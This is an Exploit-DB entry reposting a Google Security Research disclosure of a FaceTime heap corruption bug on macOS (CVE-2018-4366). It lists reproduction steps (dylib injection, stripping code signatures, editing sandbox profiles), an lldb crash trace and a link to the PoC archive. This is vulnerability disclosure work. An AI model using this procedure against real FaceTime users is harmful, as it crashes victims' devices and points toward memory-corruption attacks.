FaceTime - 'VCPDecompressionDecodeFrame' Memory Corruption

EDB-ID:

45788

CVE:

2018-4366

EDB Verified:

Author:

Google Security Research

Type:

dos

Exploit:   /  

Platform:

macOS

Date:

2018-11-06

Vulnerable App: 
There is a heap corruption vulnerability in VCPDecompressionDecodeFrame which is called by FaceTime. This bug can be reached if a user accepts a call from a malicious peer.

The issue can be reproduced using the attached sequence of RTP packets. To reproduce the issue:

    1) Build video-replay.c attached (gcc -g -dynamiclib -o mylib video-replay.c) and copy to /usr/lib/mylib
    2) Use bspatch to apply the attached binpatch to /System/Library/PrivateFrameworks/AVConference.framework/Versions/Current/AVConference. The version I patched has an md5 sum of 0de78198e29ae43e686f59d550150d1b and the patched version has an md5 sum of af5bb770f08e315bf471a0fadcf96cf8. This patch alters SendRTP to retrieve the length of an encrypted packet from offset 0x650 of the encrypted buffer, as the existing code doesn't respect the output size returned from CCCryptorUpdate
    3) Use insert_dylib (https://github.com/Tyilo/insert_dylib) to add /usr/lib/mylib to AVConference (insert_dylib --strip-codesig /usr/lib/mylib AVConference)
    4) Edit /System/Library/Sandbox/Profiles/com.apple.avconferenced.sb to add /out as allow file read and write
    5) Restart the machine
    6) Extract the attached out.zip to /out and change the permissions so it's readable by AVConference
    7) Call target, when they pick up, AVConference will crash

When I reproduced this, my host was a Mac mini running version 10.13.6. My target was a MacBook Pro running 10.13.6. This PoC only works on a Mac, but the vulnerable code appears to be in iOS 11.3.1 as well.

* thread #27, name = 'com.apple.avconference.soundplayer.recvproc', stop reason = EXC_BAD_ACCESS (code=1, address=0x21c6a1ff6)
    frame #0: 0x00007fff6bd71892 VideoProcessing`___lldb_unnamed_symbol2778$$VideoProcessing + 4492
VideoProcessing`___lldb_unnamed_symbol2778$$VideoProcessing:
->  0x7fff6bd71892 <+4492>: movl   (%rcx,%rbx), %r8d
    0x7fff6bd71896 <+4496>: bswapl %r8d
    0x7fff6bd71899 <+4499>: movl   %eax, %ecx
    0x7fff6bd7189b <+4501>: shll   %cl, %r8d
Target 0: (avconferenced) stopped.
(lldb) bt
* thread #27, name = 'com.apple.avconference.soundplayer.recvproc', stop reason = EXC_BAD_ACCESS (code=1, address=0x21c6a1ff6)
  * frame #0: 0x00007fff6bd71892 VideoProcessing`___lldb_unnamed_symbol2778$$VideoProcessing + 4492
    frame #1: 0x00007fff6bd976b6 VideoProcessing`___lldb_unnamed_symbol3007$$VideoProcessing + 117
    frame #2: 0x00007fff6bda4eb9 VideoProcessing`___lldb_unnamed_symbol3043$$VideoProcessing + 513
    frame #3: 0x00007fff6bda4b76 VideoProcessing`___lldb_unnamed_symbol3042$$VideoProcessing + 560
    frame #4: 0x00007fff6bd6b252 VideoProcessing`___lldb_unnamed_symbol2741$$VideoProcessing + 4206
    frame #5: 0x00007fff53cf67f4 VideoToolbox`___lldb_unnamed_symbol79$$VideoToolbox + 1233
    frame #6: 0x00007fff53cf5373 VideoToolbox`___lldb_unnamed_symbol59$$VideoToolbox + 401
    frame #7: 0x00007fff6bca7381 VideoProcessing`VCPDecompressionSessionDecodeFrame + 423
    frame #8: 0x000000010bb86bab AVConference`VideoPlayer_ShowFrame + 1384
    frame #9: 0x000000010bb8cf98 AVConference`VideoReceiver_ShowFrame + 740
    frame #10: 0x000000010bb8c5be AVConference`VideoReceiver_VideoAlarm + 720
    frame #11: 0x000000010bb78933 AVConference`SoundPlayer_AlarmThread + 364
    frame #12: 0x00007fff484fe98b CoreMedia`figThreadMain + 277
    frame #13: 0x00007fff6f6a6661 libsystem_pthread.dylib`_pthread_body + 340
    frame #14: 0x00007fff6f6a650d libsystem_pthread.dylib`_pthread_start + 377
    frame #15: 0x00007fff6f6a5bf9 libsystem_pthread.dylib`thread_start + 13

I've improved the PoC a lot for this, an updated video-replay.c is attached.  This version does not require the binary patch for the sender binary, other than adding the library with insert_dylib. So to use this one:

1) Build video-replay.c attached (g++ -std=c++11 -g -dynamiclib -o mylib video-replay.c) and copy to /usr/lib/mylib
2) Use insert_dylib (https://github.com/Tyilo/insert_dylib) to add /usr/lib/mylib to AVConference (insert_dylib --strip-codesig /usr/lib/mylib AVConference)
3) Edit /System/Library/Sandbox/Profiles/com.apple.avconferenced.sb to add /out as allow file read and write
4) Restart the machine
5) Extract the attached out.zip to /out and change the permissions so it's readable by AVConference
6) Call target with FaceTime, when they pick up, AVConference will crash


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45788.zip
Tags: Denial of Service (DoS)
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services